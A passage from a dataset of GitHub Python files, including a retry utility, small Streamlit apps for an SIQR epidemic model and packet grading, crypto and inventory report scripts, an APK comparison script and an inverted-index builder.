retrying).\n\n        :param error: Error that was raised from an attempt.\n        \"\"\"\n        pass\n\n\nclass SuppressAllErrorStrategy(ErrorStrategy):\n    \"\"\"An :class:`ErrorStrategy` that suppresses all types of errors raised\n    on attempts to perform the call.\"\"\"\n\n    def should_suppress(self, error):\n        return True\n\n\nclass StopStrategy(object):\n    \"\"\"Determines for how long a :class:`Retryer` should keep (re)trying.\"\"\"\n    __metaclass__ = abc.ABCMeta\n\n    @abc.abstractmethod\n    def should_continue(self, attempts, elapsed_time):\n        \"\"\"Called after a failed attempt to determine if we should keep trying.\n\n        :param attempts: Total number of (failed) attempts thus far.\n        :type attempts: int\n        :param elapsed_time: Total elapsed time since first attempt.\n        :type elapsed_time: timedelta\n\n        :return: `True` if the `Retryer` should keep trying, `False` otherwise.\n        :rtype: bool\n        \"\"\"\n        pass\n\n\nclass NeverStopStrategy(StopStrategy):\n    \"\"\"A :class:`StopStrategy` that never gives up.\"\"\"\n\n    def should_continue(self, attempts, elapsed_time):\n        return True\n\n\nclass MaxRetriesStopStrategy(StopStrategy):\n    \"\"\"A :class:`StopStrategy` that gives up after a certain number of retries.\"\"\"\n\n    def __init__(self, max_retries):\n        self.max_retries = max_retries\n\n    def should_continue(self, attempts, elapsed_time):\n        return attempts <= self.max_retries\n\n\nclass Retryer(object):\n    \"\"\"A :class:`Retryer` makes repeated calls to a function until either\n    the return value satisfies a certain condition (`returnval_predicate`)\n    or until a stop strategy (`stop_strategy`) determines that enough\n    attempts have been made (or too long a time has elapsed). Should the\n    `stop_strategy` decide to abort, a :class:`GaveUpError` is raised.\n\n    The delay between attempts is controlled by a `delay_strategy`.\n\n    Should the attempted call raise an Exception, an `error_strategy` gets\n    to decide if the error should be suppressed or re-raised (in which case\n    the retrying ends with that error).\n    \"\"\"\n\n    def __init__(\n            self,\n            returnval_predicate=lambda returnval: True,\n            delay_strategy=NoDelayStrategy(),\n            stop_strategy=NeverStopStrategy(),\n            error_strategy=SuppressAllErrorStrategy()):\n        \"\"\"Creates a new :class:`Retryer` set up to use a given set of\n        strategies to control its behavior.\n\n        With only default values, the retryer will keep retrying\n        indefinitely until a value (any value) is returned by\n        the called function. Any raised errors will be suppressed.\n\n        :param returnval_predicate: predicate that determines if a return\n            value is considered successful. When the predicate evaluates to\n            `True`, the `call` function will return with that return value.\n        :type returnval_predicate: `function(returnvalue) => bool`\n        :param delay_strategy: determines the time delay to introduce between\n            attempts.\n        :type delay_strategy: :class:`DelayStrategy`\n        :param stop_strategy: determines when we are to stop retrying.\n        :type stop_strategy: :class:`StopStrategy`\n        :param error_strategy: determines which errors (if any) to suppress\n            when raised by the called function (`None` to stop on any error).\n        :type error_strategy: :class:`ErrorStrategy`\n        \"\"\"\n        self.returnval_predicate = returnval_predicate\n        self.delay_strategy = delay_strategy\n        self.stop_strategy = stop_strategy\n        self.error_strategy = error_strategy\n\n    def call(self, function, *args, **kw):\n        \"\"\"Calls the given `function`, with the given arguments, repeatedly\n        until either (1) a satisfactory result is obtained (as indicated by\n        the `returnval_predicate`), or (2) until the `stop_strategy`\n        determines that no more attempts are to be made (results in a\n        `GaveUpError`), or (3) until the called function raises an error\n        that is not suppressed by the `error_strategy` (the call will raise\n        that error).\n\n        :param function: A `callable`.\n        :param args: Any positional arguments to call `function` with.\n        :param kw: Any keyword arguments to call `function` with.\n        \"\"\"\n        name = function.__name__\n        start = datetime.now()\n        attempts = 0\n        while True:\n            try:\n                attempts += 1\n                log.info('{%s}: attempt %d ...', name, attempts)\n                returnval = function(*args, **kw)\n                if self.returnval_predicate(returnval):\n                    # return value satisfies predicate, we're done!\n                    log.debug('{%s}: success: \"%s\"', name, returnval)\n                    return returnval\n                log.debug('{%s}: failed: return value: %s', name, returnval)\n            except Exception as e:\n                if self.error_strategy is None or not self.error_strategy.should_suppress(e):\n                    raise e\n                log.debug('{%s}: failed: error: %s', name, e)\n            elapsed_time = datetime.now() - start\n            # should we make another attempt?\n            if not self.stop_strategy.should_continue(attempts, elapsed_time):\n                raise GaveUpError('{{{}}}: gave up after {} failed attempt(s)'.format(name, attempts))\n            delay = self.delay_strategy.next_delay(attempts)\n            log.info('{%s}: waiting %d seconds for next attempt', name, delay.total_seconds())\n            
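# --- Editorial note: a minimal usage sketch for the Retryer class above, assuming a
# hypothetical `fetch_status` callable (not part of the original module). It retries
# with exponential backoff (1s, 2s, 4s, ...) until "done" is returned, giving up
# (with GaveUpError) once attempts exceed max_retries:
#
#     retryer = Retryer(
#         returnval_predicate=lambda v: v == "done",
#         delay_strategy=ExponentialBackoffDelayStrategy(timedelta(seconds=1)),
#         stop_strategy=MaxRetriesStopStrategy(5))
#     result = retryer.call(fetch_status)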
time.sleep(delay.total_seconds())\n","repo_name":"petergardfjall/garminexport","sub_path":"garminexport/retryer.py","file_name":"retryer.py","file_ext":"py","file_size_in_byte":8151,"program_lang":"python","lang":"en","doc_type":"code","stars":455,"dataset":"github-code","pt":"72"} +{"seq_id":"69813805674","text":"from collections import deque\n'''\nif waitlist, bridge empty: end\nif sum(onbringe) + waitlist[-1] > wei:\n onbridge.append(0)\n onbridge.popleft()\n\n'''\nn, bridgelen, wei = map(int, input().split())\nwaitlist = [*map(int, input().split())][::-1] # 반대로 받아서 pop\nonbridge = deque()\nfor _ in range(bridgelen):\n onbridge.append(0)\ntime = 0\nwhile waitlist or onbridge:\n onbridge.popleft()\n if waitlist:\n if sum(onbridge) + waitlist[-1] > wei:\n onbridge.append(0)\n else:\n onbridge.append( waitlist.pop() ) \n else:\n time += bridgelen\n break\n \n time += 1\n #print(onbridge)\nprint(time)\n","repo_name":"JannaKim/PS","sub_path":"swk_course/0628/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32958583906","text":"from src.classes.FillWindow import FillWindow, QtWidgets\nimport sys\n\n\ndef main():\n app = QtWidgets.QApplication(sys.argv)\n main_window = QtWidgets.QMainWindow()\n ui = FillWindow(main_window)\n main_window.show()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"DaniilMashkov/MetallProfile_app","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24623347396","text":"import streamlit as st\r\nimport numpy as np\r\nfrom scipy.integrate import solve_ivp\r\nimport plotly.graph_objects as go\r\nimport plotly.express as px\r\n\r\ndef modelo_siqr(t, z, a, sigma, theta, alpha, gamma):\r\n S, I, Q, R = z\r\n N = S + I + Q + R\r\n return [-a*S*(I+(1-sigma))/(N-sigma*Q), a*S*(I+(1-sigma))/(N-sigma*Q)-(theta+alpha)*I, theta*I-gamma*Q, alpha*I+gamma*Q]\r\n\r\ndef main():\r\n st.title('Modelo SIQR')\r\n\r\n st.header('Ecuaciones del modelo')\r\n st.latex(r'''\r\n \\left\\{\r\n \\begin{array}{l}\r\n S'= -aS\\frac{I+(1-\\sigma)Q}{N-\\sigma Q}\\\\\r\n I'= aS\\frac{I+(1-\\sigma)Q}{N-\\sigma Q}-(\\theta+\\alpha)I\\\\\r\n Q'=\\theta I-\\gamma Q\\\\\r\n R'=\\alpha I+\\gamma Q\r\n \\end{array}\r\n \\right.\r\n ''')\r\n\r\n st.sidebar.header('Parámetros del modelo')\r\n a = st.sidebar.number_input('a', min_value=0.0, max_value=10.0, value=2.0, step=0.1)\r\n sigma = st.sidebar.number_input('sigma', min_value=0.0, max_value=10.0, value=0.1, step=0.1)\r\n theta = st.sidebar.number_input('theta', min_value=0.0, max_value=10.0, value=1.0, step=0.1)\r\n alpha = st.sidebar.number_input('alpha', min_value=0.0, max_value=10.0, value=1.0, step=0.1)\r\n gamma = st.sidebar.number_input('gamma', min_value=0.0, max_value=10.0, value=1.0, step=0.1)\r\n\r\n st.sidebar.header('Condiciones iniciales')\r\n S0 = st.sidebar.number_input('S0', min_value=0, max_value=10000000, value=80, step=10)\r\n I0 = st.sidebar.number_input('I0', min_value=0, max_value=10000000, value=10, step=10)\r\n Q0 = st.sidebar.number_input('Q0', min_value=0, max_value=10000000, value=10, step=10)\r\n R0 = st.sidebar.number_input('R0', min_value=0, max_value=10000000, value=0, step=10)\r\n\r\n st.sidebar.header('Otras opciones')\r\n t_max = st.sidebar.number_input('t_max', min_value=10, max_value=1000, value=20, step=5)\r\n\r\n 
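# --- Editorial note: a minimal sketch of solving the same SIQR system outside
# Streamlit, using the app's default sidebar values (a=2.0, sigma=0.1,
# theta=alpha=gamma=1.0), initial state [S0, I0, Q0, R0] = [80, 10, 10, 0],
# and t_max=20; `modelo_siqr` is the model function defined above:
#
#     sol = solve_ivp(modelo_siqr, [0, 20], [80, 10, 10, 0],
#                     args=(2.0, 0.1, 1.0, 1.0, 1.0), dense_output=True)
#     S, I, Q, R = sol.sol(np.linspace(0, 20, 200))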
st.header('Solución del modelo')\r\n sol = solve_ivp(modelo_siqr, [0, t_max], [S0, I0, Q0, R0], args=(a, sigma, theta, alpha, gamma), dense_output=True)\r\n st.write(sol.message)\r\n\r\n t = np.arange(0, t_max, 0.01)\r\n Z = sol.sol(t)\r\n\r\n fig = go.Figure()\r\n names = ['S','I','Q','R']\r\n for i, z in enumerate(Z):\r\n fig.add_trace(go.Scatter(\r\n x=t,\r\n y=z,\r\n name=names[i],\r\n marker_color=px.colors.qualitative.D3[i]\r\n ))\r\n\r\n fig.update_layout(\r\n title='Soluciones del sistema SIQR',\r\n xaxis_title='t',\r\n template='ggplot2',\r\n height=500\r\n )\r\n\r\n st.plotly_chart(fig, use_container_width=True) ","repo_name":"joaquin-silva/modelos-biomatematicos","sub_path":"siqr.py","file_name":"siqr.py","file_ext":"py","file_size_in_byte":2509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26036856132","text":"\r\n#TRIANGULO INVERSO\r\ndef trianguloInverso(num, i, var):\r\n return\r\n\r\nprint(\"*** Triangulo Inverso ****\")\r\nnum = int(input(\"Introduce la altura del triángulo: \"))\r\n\r\nfor var in reversed(range(0, num)):\r\n for i in range(0, num - var - 1):\r\n #espacios\r\n print(end=\" \")\r\n for i in range(0, var + 1):\r\n print(\"*\", end=\" \")\r\n print()\r\n","repo_name":"EduDN/LibreriaTriangulos","sub_path":"libreria_Tinverso.py","file_name":"libreria_Tinverso.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36887003597","text":"import streamlit as st\r\nimport numpy as np\r\n\r\nst.set_page_config(page_title=\"Packet Grading App\",\r\n page_icon=\":check_mark:\", layout=\"wide\")\r\n\r\nst.title('Packet Grading Program')\r\n#st.sidebar.success(\"Select a page above\")\r\n\r\n\r\nst.markdown('''This provides a quick and simple method to grade\r\npackets, providing fractional and percentage grades.''')\r\n\r\nTotal = st.number_input('Enter the total point value of the packet:', step = 1)\r\n\r\nPoints_float = (0,0)\r\n\r\nEarn = st.text_input('''Enter the number of points lost on each page, separated by commas, spaces, or dashes.\r\nEx: 1,5,13 OR 1 5 13 OR 1-5-13''')\r\n\r\ntry:\r\n Points = Earn.split('-')\r\n Points_float = [float(x) for x in Points]\r\nexcept:\r\n try:\r\n Points = Earn.split(' ')\r\n Points_float = [float(x) for x in Points]\r\n except:\r\n try:\r\n Points = Earn.split(',')\r\n Points_float = [float(x) for x in Points]\r\n except:\r\n st.title('Invalid method of entering points earned!')\r\n\r\nEC = st.text_input('''Enter the points awarded through extra credit.\r\nEnter 0 if none''')\r\n\r\ntry:\r\n EC = float(EC)\r\nexcept:\r\n EC = 0\r\n\r\nTotal_Lost = sum(Points_float)\r\n\r\nTotal_Earn = Total - Total_Lost + EC\r\n\r\nif Total == 0:\r\n st.write('Configure total points of assignment')\r\nelse:\r\n st.write('''Fractional Grade:''', Total_Earn, '/', Total)\r\n st.write('Percentage Grade: ', round(Total_Earn/Total*100,2), '%')\r\n\r\n\r\nst.text('''Version 1.2.1\r\n1.0 Creation of app\r\n1.1 Points entered are now the points that were lost rather than earned.\r\n1.2 Added extra credit option\r\n1.2.1 Adjusted point entry to integer if using the plus/minus buttons''')\r\n","repo_name":"PLAknazaXM/Education","sub_path":"Grading/Packet_Grading.py","file_name":"Packet_Grading.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41246043688","text":"import utils\nimport 
json\n\ndef handleCelsiusFile(fileList: list):\n headerFile = fileList[0]\n fileList.remove(headerFile)\n celsiusCoins = getCelsiusTransaction(fileList, headerFile)\n print(\"#### Celsius ####\", json.dumps(celsiusCoins, indent=2),\n json.dumps(utils.getAmmount(celsiusCoins), indent=2),\n json.dumps(utils.getCoinAmmount(celsiusCoins), indent=2))\n\ndef getCelsiusTransaction(fileList: list, headerFile: list):\n transactions = {}\n transactionTypeListNum = 0\n dateTimeListNum = 0\n usdValueListNum = 0\n coinTypeListNum = 0\n coinAmmountListNum = 0\n\n for n, e in enumerate(headerFile):\n if e == 'Transaction type':\n transactionTypeListNum = n\n if e == 'Date and time':\n dateTimeListNum = n\n if e == 'USD Value':\n usdValueListNum = n\n if e == 'Coin type':\n coinTypeListNum = n\n if e == 'Coin amount':\n coinAmmountListNum = n\n\n for row in fileList:\n # Trasformo la data nel formato gg/mm/aaaa\n dateRow = utils.getDate(row[dateTimeListNum], 'celsius')\n\n transactions[dateRow] = transactions.get(\n dateRow, {})\n\n if row[transactionTypeListNum] == 'Transfer':\n transactions[dateRow]['transfer'] = transactions[dateRow].get(\n 'transfer', 0.0) + float(row[usdValueListNum])\n transactions[dateRow]['ammount'] = transactions[dateRow].get(\n 'ammount', 0.0) + float(row[usdValueListNum])\n transactions[dateRow][row[coinTypeListNum]] = transactions[dateRow].get(\n row[coinTypeListNum], 0.0) + float(row[coinAmmountListNum])\n\n if row[transactionTypeListNum] == 'Reward' or row[transactionTypeListNum] == 'Promo Code Reward' or row[transactionTypeListNum] == 'Referred Award':\n transactions[dateRow]['ammount'] = transactions[dateRow].get(\n 'ammount', 0.0) + float(row[usdValueListNum])\n transactions[dateRow][row[coinTypeListNum]] = transactions[dateRow].get(\n row[coinTypeListNum], 0.0) + float(row[coinAmmountListNum])\n return transactions","repo_name":"ralls0/Simple-script","sub_path":"python/cryptoAccounting/celsius.py","file_name":"celsius.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72340766952","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nINVENTARI DE CNMC Despatxos\n\"\"\"\nfrom __future__ import absolute_import\nfrom datetime import datetime\nimport traceback\n\nfrom libcnmc.core import StopMultiprocessBased\nfrom libcnmc.utils import format_f, get_forced_elements, adapt_diff\nfrom libcnmc.models import F6Res4666\n\n\nclass DES(StopMultiprocessBased):\n \"\"\"\n Class that generates the Despachos(6) file of the 4666\n \"\"\"\n def __init__(self, **kwargs):\n \"\"\"\n Class constructor\n :param kwargs: year(generation year), codi_r1 R1 code\n :return: CT\n \"\"\"\n super(DES, self).__init__(**kwargs)\n self.year = kwargs.pop('year', datetime.now().year - 1)\n self.codi_r1 = kwargs.pop('codi_r1')\n self.base_object = 'Línies DES'\n self.report_name = 'CNMC INVENTARI DES'\n self.compare_field = kwargs[\"compare_field\"]\n\n def get_sequence(self):\n \"\"\"\n Method that generates a list of ids to pass to the consummer\n :return: List of ids\n \"\"\"\n data_limit = '01-01-{}'.format(self.year+1)\n search_params = [('data_apm', '<=', data_limit)]\n\n ids = self.connection.GiscedataDespatx.search(search_params)\n\n forced_ids = get_forced_elements(self.connection, \"giscedata.despatx\")\n\n ids = ids + forced_ids[\"include\"]\n ids = list(set(ids) - set(forced_ids[\"exclude\"]))\n\n return list(set(ids))\n\n def consumer(self):\n \"\"\"\n Method that generates the 
csv file\n        :return: List of arrays\n        \"\"\"\n        O = self.connection\n        fields_to_read = [\n            'name', 'cini', 'denominacio', 'any_ps', 'vai', 'data_apm',\n            self.compare_field\n        ]\n        while True:\n            try:\n                item = self.input_q.get()\n                if item == \"STOP\":\n                    self.input_q.task_done()\n                    break\n                self.progress_q.put(item)\n\n                despatx = O.GiscedataDespatx.read(\n                    item, fields_to_read)\n                tmp_date = datetime.strptime(despatx['data_apm'], '%Y-%m-%d')\n                data_apm = tmp_date.strftime('%d/%m/%Y')\n                fecha_baja = ''\n\n                if despatx[self.compare_field]:\n                    data_entregada = despatx[self.compare_field]\n                    entregada = F6Res4666(**data_entregada)\n                    actual = F6Res4666(\n                        despatx['name'],\n                        despatx['cini'],\n                        despatx['denominacio'],\n                        data_apm,\n                        fecha_baja,\n                        format_f(despatx['vai']),\n                        0\n                    )\n                    if actual == entregada:\n                        estado = '0'\n                    else:\n                        self.output_m.put(\"{} {}\".format(despatx[\"name\"], adapt_diff(actual.diff(entregada))))\n                        self.output_m.put(\"Identificador:{} diff:{}\".format(despatx[\"name\"], actual.diff(entregada)))\n                        estado = '1'\n                else:\n                    if despatx['data_apm']:\n                        if despatx['data_apm'][:4] != str(self.year):\n                            self.output_m.put(\"Identificador:{} No estava en el fitxer carregat al any n-1 i la data de PM es diferent al any actual\".format(despatx[\"name\"]))\n                            estado = '1'\n                        else:\n                            estado = '2'\n                    else:\n                        self.output_m.put(\"Identificador:{} No estava en el fitxer carregat al any n-1\".format(despatx[\"name\"]))\n                        estado = '1'\n                output = [\n                    '{0}'.format(despatx['name']),  # IDENTIFICADOR\n                    despatx['cini'] or '',  # CINI\n                    despatx['denominacio'] or '',  # DENOMINACION\n                    data_apm,  # FECHA APS\n                    fecha_baja,  # FECHA BAJA\n                    format_f(despatx['vai'], 3),  # VALOR INVERSION\n                    estado  # ESTADO\n                ]\n\n                self.output_q.put(output)\n                self.input_q.task_done()\n            except Exception:\n                self.input_q.task_done()\n                traceback.print_exc()\n                if self.raven:\n                    self.raven.captureException()\n","repo_name":"gisce/libCNMC","sub_path":"libcnmc/res_4666/DES.py","file_name":"DES.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"}
{"seq_id":"4979802535","text":"import re\n\n\n# named groups restored below: they were stripped from the pattern in\n# extraction, but m.group('scheme') and m.group('identifier') require them\nresolver_regexp = \"\\\\((?P<scheme>\\\\w+)\\\\)(?P<identifier>\\\\S+)\"\n\n\ndef resolve_subject(val, part):\n    p = re.compile(resolver_regexp)\n    m = p.search(val)\n    if m:\n        if part == 'identifier':\n            identifier = m.group('identifier')\n            if m.group('scheme') == 'gnd':\n                return \"gnd:{0}\".format(identifier)\n            return identifier\n        elif part == 'scheme':\n            return m.group('scheme')\n        else:\n            return \"\"\n    else:\n        return \"\"\n","repo_name":"aeonium/lw-daap","sub_path":"lw_daap/base/recordext/functions/resolve_subject.py","file_name":"resolve_subject.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"5794875134","text":"'''Python exercise 095: Improve challenge 93 so that it works with several players,\nincluding a system for viewing the performance details of each player.'''\njogador = {}\nlista = []\ntime = []\n\nwhile True:\n    jogador.clear()\n    lista.clear()\n    jogador['nome'] = str(input('Nome do jogador: ')).title()\n    n = int(input(f'Quantas partidas {jogador[\"nome\"]} jogou? '))\n    for c in range(0,n):\n        lista.append(int(input(f' Quantos gols na {c+1}o partida? ')))\n    jogador['gols'] = lista.copy()\n    jogador['total'] = sum(lista)\n    time.append(jogador.copy())\n    cont = str(input('Deseja continuar? ')).strip().upper()[0]\n    while cont not in 'SN':\n        cont = str(input('Deseja continuar? 
')).strip().upper()[0]\n if cont == 'N':\n break\nprint('-'*50)\nprint(f'{\"cod.\":>4} ',end='')\nfor i in jogador.keys():\n print(f'{i:<15}',end='')\nprint()\nfor c, v in enumerate(time):\n print(f'{c} ',end='')\n for d in v.values():\n print(f'{str(d):<13} ',end='')\n print()\nprint('=-=' * 30)\nwhile True:\n busca = int(input('Mostrar dados de qual jogador? [999 para parar]: '))\n if busca == 999:\n break\n if busca >= len(time):\n print('ERRO! Jogador nao encontrado!')\n else:\n print(f'LEVANTAMENTO DO JOGADOR {time[busca][\"nome\"]}')\n for c, v in enumerate(time[busca]['gols']):\n print(f'No jogo {c} fez {v} gols')\n print('-'*40)\nprint('VOLTE SEMPRE!!!')\n\n\n\n\n\n\n","repo_name":"RichardRozin/Python","sub_path":"Exercicios Python Curso em Video/Mundo 3/ex095.py","file_name":"ex095.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34995255534","text":"import json\nimport csv\nimport shutil\nimport time\n\nfrom database import DataBase\nfrom util import create_if_not_exist\nimport os\nfrom subprocess import Popen, PIPE, STDOUT\n\nroot_path = \"D:\\\\PyCharm 2021.2.1\\\\code\\\\lint_full_compare\\\\download\\\\download_file\"\nsimi_droid_path = \"D:\\\\PyCharm 2021.2.1\\\\code\\\\lint_full_compare\\\\code_compare\\\\SimiDroid\\\\artefacts\"\ndb = DataBase()\n\nfor app_pair_dir in os.listdir(root_path):\n download_mission = db.query_download_mission_by_lite_app_id(app_pair_dir)\n lite_app_id = download_mission[1]\n full_app_id = download_mission[3]\n\n if download_mission[7] != 0 or download_mission[2] != 1 or download_mission[4] != 1:\n continue\n\n lite_apk_path = os.path.join(root_path, app_pair_dir, lite_app_id + \".apk\")\n full_apk_path = os.path.join(root_path, app_pair_dir, full_app_id + \".apk\")\n\n if not os.path.exists(lite_apk_path) or not os.path.exists(full_apk_path):\n print(\"do not find app pair on path \" + os.path.join(root_path, app_pair_dir))\n print(\"----------\")\n continue\n\n full_path = os.path.join(root_path, app_pair_dir, full_app_id)\n lite_path = os.path.join(root_path, app_pair_dir, lite_app_id)\n\n create_if_not_exist(full_path)\n create_if_not_exist(lite_path)\n\n shutil.copy(lite_apk_path, simi_droid_path)\n shutil.copy(full_apk_path, simi_droid_path)\n\n print(\"using SimiDroid on {} and {}\".format(lite_app_id, full_app_id))\n os.chdir(simi_droid_path)\n\n p = Popen(['java', '-jar', 'SimiDroid.jar', lite_app_id + \".apk\", full_app_id + \".apk\"], stdout=PIPE, stderr=PIPE)\n p.wait()\n\n time.sleep(1)\n os.remove(os.path.join(simi_droid_path, lite_app_id + \".apk\"))\n os.remove(os.path.join(simi_droid_path, full_app_id + \".apk\"))\n\n if os.path.exists(os.path.join(root_path, app_pair_dir, \"component_stat.csv\")):\n os.remove(os.path.join(root_path, app_pair_dir, \"component_stat.csv\"))\n\n result_file = \"{}-{}.json\".format(lite_app_id, full_app_id)\n\n with open(result_file, encoding=\"utf8\", errors=\"ignore\") as r:\n method_data = json.load(r)\n\n method_conclusion = method_data['conclusion']\n method_verbose = method_data['verbose']\n\n method_header = []\n method_data = []\n\n for _ in method_conclusion:\n method_header.append(_)\n method_data.append(method_conclusion[_])\n\n with open(os.path.join(root_path, app_pair_dir, \"method_stat.csv\"), \"a+\", newline=\"\") as w:\n writer = csv.writer(w)\n writer.writerow(method_header)\n writer.writerow(method_data)\n writer.writerow([])\n\n verbose_identical = 
method_verbose['identical']\n verbose_similar = method_verbose['similar']\n verbose_new = method_verbose['new']\n verbose_deleted = method_verbose['deleted']\n\n verbose_header = [\"method_signature\", \"lite\", \"full\", \"is_similar\"]\n verbose_data = []\n\n for _ in verbose_identical:\n verbose_data.append([_, 1, 1, 0])\n\n for _ in verbose_similar:\n verbose_data.append([_, 1, 1, 1])\n\n for _ in verbose_new:\n verbose_data.append([_, 1, 0, 0])\n\n for _ in verbose_deleted:\n verbose_data.append([_, 0, 1, 0])\n\n with open(os.path.join(root_path, app_pair_dir, \"method_stat.csv\"), \"a+\", newline=\"\") as w:\n writer = csv.writer(w)\n writer.writerow(verbose_header)\n for _ in verbose_data:\n writer.writerow(_)\n\n os.remove(result_file)\n db.update_method_compare_by_lite_app_id(lite_app_id, True)\n print(\"----------\")\n","repo_name":"Clearymk/lint_full_compare","sub_path":"compare_method.py","file_name":"compare_method.py","file_ext":"py","file_size_in_byte":3484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12435968653","text":"from src.commons.variables import temp_index_file, output_folder, index_folder, misc_folder, temp_folder\nfrom collections import defaultdict, OrderedDict\nimport os\n\nclass Indexer(object):\n def __init__(self, name, existing=False, cfile=None, tfile=None, dfile=None):\n self.termMap = []\n self.docMap = []\n self.indexname = name\n self.catalog = defaultdict(int)\n self.df = defaultdict(int)\n self.ttf = defaultdict(int)\n self.dlen = defaultdict(int)\n self.temp_file = temp_folder + name + \"temp\" + \".index\"\n self.temp_catalog_file = temp_folder + name + \"temp\" + \".catalog\"\n self.clearTempFile()\n self.consolidate = 0\n self.catalog2 = {}\n\n if existing:\n self.readDocMap(docFile=dfile)\n self.readTermMap(tfile)\n self.readCatalog(cfile)\n\n def clearTempFile(self):\n try:\n f = open(self.temp_file, 'r+')\n f.truncate()\n except FileNotFoundError:\n f = open(self.temp_file, 'w')\n\n def readTermMap(self, termFile):\n termMap = []\n # Read from file\n with open(termFile, \"r\") as infile:\n for line in infile:\n termMap.append(line.strip())\n self.termMap = termMap\n\n def readDocMap(self, docFile):\n docMap = []\n # Read from file\n with open(docFile, \"r\") as infile:\n for line in infile:\n docMap.append(line.strip())\n self.docMap = docMap\n\n def getVocabSize(self):\n return len(self.termMap)\n\n def getSumTTF(self):\n return len(self.ttf.values())\n\n def getDLen(self, name):\n id = self.getItemName(name, self.docMap)\n return self.dlen[id]\n\n def addDLen(self, name, dlen):\n id = self.getSetItemId(name, self.docMap)\n self.dlen[id] = dlen\n\n def getAvgDLen(self):\n return sum(self.dlen.values())/len(self.dlen)\n\n def getSetItemId(self, term, someMap):\n if term not in someMap:\n i = len(someMap)\n someMap.append(term)\n else:\n i = someMap.index(term)\n return i\n\n def getItemName(self, id, someMap):\n return someMap[id]\n\n def createTermList(self, docs_tokens):\n itermCount = defaultdict(dict)\n for doc, tokens in docs_tokens.items():\n for token in enumerate(tokens):\n pos = token[0]\n tokenId = self.getSetItemId(token[1], self.termMap)\n docId = self.getSetItemId(doc, self.docMap)\n\n if tokenId not in itermCount.keys():\n itermCount[tokenId] = {}\n if docId not in itermCount[tokenId].keys():\n itermCount[tokenId][docId] = {}\n itermCount[tokenId][docId]['tf'] = 0\n itermCount[tokenId][docId]['pos'] = []\n itermCount[tokenId][docId]['tf'] += 1\n 
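# --- Editorial note: at this point in createTermList, itermCount accumulates a
# nested dict of the form {token_id: {doc_id: {'tf': term_frequency, 'pos': [token positions]}}}.
# For example, indexing the document "to be or not to be" (doc id 0, with "to"
# mapped to token id 0) leaves itermCount[0][0] == {'tf': 2, 'pos': [0, 4]}.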
itermCount[tokenId][docId]['pos'].append(pos)\n for tokenId, docs in itermCount.items():\n self.df[tokenId] += len(docs.keys())\n self.ttf[tokenId] += sum(map(lambda d: d['tf'], docs.values()))\n\n for tokenId in itermCount.keys():\n temp_docs = itermCount[tokenId]\n sorted_docs = OrderedDict(sorted(temp_docs.items(), key=lambda x: x[1][\"tf\"], reverse=True))\n itermCount[tokenId] = sorted_docs\n return itermCount\n\n def readTermFromFile(self, filename, termIdRef):\n ntc = {}\n f = open(filename)\n f.seek(self.catalog[termIdRef])\n line = f.readline().strip()\n (termId, df, ttf, docs) = line.strip().split(\":\")\n mdocs = docs.split(\"|\")\n for p in mdocs:\n docId, tf, els = p.split(\",\")\n ntc[docId] = {}\n ntc[docId]['tf'] = int(tf)\n ntc[docId]['pos'] = list(map(lambda x: int(x), els.split(\".\")))\n return ntc, int(df), int(ttf)\n\n def readTermFromFile2(self, filename, termIdRef):\n ntc = {}\n f = open(filename)\n f.seek(self.catalog2[termIdRef][filename])\n line = f.readline().strip()\n (termId, df, ttf, docs) = line.strip().split(\":\")\n mdocs = docs.split(\"|\")\n for p in mdocs:\n docId, tf, els = p.split(\",\")\n ntc[docId] = {}\n ntc[docId]['tf'] = int(tf)\n ntc[docId]['pos'] = list(map(lambda x: int(x), els.split(\".\")))\n return ntc, int(df), int(ttf)\n\n def mergeDocs(self, termId, filename, nw_docs):\n old_docs, df, ttf = self.readTermFromFile(filename, termId)\n\n join_docs = {}\n join_docs.update(nw_docs)\n join_docs.update(old_docs)\n newdocs = OrderedDict(sorted(join_docs.items(), key=lambda x: x[1][\"tf\"], reverse=True))\n return newdocs\n\n def writeTempData(self, itermCount, consolidateRate=5):\n with open(self.temp_file, \"a\") as out:\n for termId, docs in itermCount.items():\n if termId in self.catalog.keys():\n # print(\"Merging {} term with previous index.\".format(termId))\n docs = self.mergeDocs(termId, self.temp_file, docs)\n # print(docs)\n self.catalog[termId] = out.tell()\n outStr = str(termId) + \":\" + str(self.df[termId]) + \":\" + str(self.ttf[termId]) + \":\"\n tempStr = []\n\n for docId, values in docs.items():\n tempStr.append(str(docId) + \",\" + str(values['tf']) + \",\" + \"{}\".format(\n \".\".join(map(lambda x: str(x), values['pos']))))\n outStr += \"|\".join(tempStr)\n # print(outStr)\n out.write(outStr + \"\\n\")\n self.consolidate += 1\n if self.consolidate > consolidateRate:\n print(\"Consolidating temp index. 
